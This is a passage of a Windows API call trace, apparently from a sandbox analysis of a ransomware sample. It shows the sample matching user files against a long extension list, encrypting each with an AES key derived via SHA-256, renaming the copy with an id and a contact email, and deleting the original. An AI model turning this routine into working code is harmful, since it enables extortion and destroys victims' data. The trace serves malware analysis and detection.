2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".rtf") returned=".rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0185.895] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0185.895] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0185.896] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\hzoe.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hzoe.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0185.903] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x172a6, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x172a6, lpOverlapped=0x0) returned 1
	[0185.907] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.907] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcba18) returned 1
	[0185.909] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.909] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0185.910] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.910] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0185.910] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.910] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0185.910] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.910] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x172a6, dwBufLen=0x172a6 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x172b0) returned 1
	[0185.913] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.913] RtlMoveMemory (in: Destination=0xff4430, Source=0xfdd180, Length=0x172a6 | out: Destination=0xff4430) 
	[0185.913] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.913] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff4430*, pdwDataLen=0x18bc0c*=0x172a6, dwBufLen=0x172b0 | out: pbData=0xff4430*, pdwDataLen=0x18bc0c*=0x172b0) returned 1
	[0185.916] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.916] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0185.927] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.927] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0185.927] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.928] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0185.928] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.928] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0185.929] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.929] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0185.930] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\hzoe.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 82
	[0185.930] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\hzoe.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hzoe.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0185.930] WriteFile (in: hFile=0x2c0, lpBuffer=0xff4430*, nNumberOfBytesToWrite=0x172b0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xff4430*, lpNumberOfBytesWritten=0x18c068*=0x172b0, lpOverlapped=0x0) returned 1
	[0185.938] CloseHandle (hObject=0x2c0) returned 1
	[0185.938] CloseHandle (hObject=0x384) returned 1
	[0185.938] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\hzoe.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hzoe.rtf")) returned 1
	[0185.959] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\hzoe.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hzoe.rtf")) returned 0
	[0185.959] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1eb7d10, ftCreationTime.dwHighDateTime=0x1d92797, ftLastAccessTime.dwLowDateTime=0xf3c9bb10, ftLastAccessTime.dwHighDateTime=0x1d94155, ftLastWriteTime.dwLowDateTime=0xf3c9bb10, ftLastWriteTime.dwHighDateTime=0x1d94155, nFileSizeHigh=0x0, nFileSizeLow=0xc9fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="IjlJDU.pptx", cAlternateFileName="IJLJDU~1.PPT")) returned 1
	[0185.959] lstrcmpW (lpString1="IjlJDU.pptx", lpString2="..") returned 1
	[0185.959] lstrcmpW (lpString1="IjlJDU.pptx", lpString2=".") returned 1
	[0185.959] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0185.959] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="IjlJDU.pptx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\IjlJDU.pptx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\IjlJDU.pptx"
	[0185.959] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\IjlJDU.pptx") returned 43
	[0185.960] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0185.960] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\IjlJDU.pptx", cchLength=0x2b | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\ijljdu.pptx") returned 0x2b
	[0185.960] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.960] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\ijljdu.pptx", lpSrch="help_decrypt_your_files") returned 0x0
	[0185.960] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\ijljdu.pptx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\ijljdu.pptx") returned="c:\\users\\rdhj0cnfevzx\\documents\\ijljdu.pptx"
	[0185.960] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\ijljdu.pptx") returned 43
	[0185.960] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.961] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.961] StrStrW (lpFirst=".pptx", lpSrch=".") returned=".pptx"
	[0185.961] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.961] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".pptx") returned=".pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0185.961] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0185.962] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0185.962] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\ijljdu.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ijljdu.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0186.007] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xc9fe, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0xc9fe, lpOverlapped=0x0) returned 1
	[0186.011] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.011] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcac48) returned 1
	[0186.014] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.014] CryptCreateHash (in: hProv=0xfcac48, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0186.014] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.014] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0186.014] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.014] CryptDeriveKey (in: hProv=0xfcac48, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb98f0) returned 1
	[0186.014] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
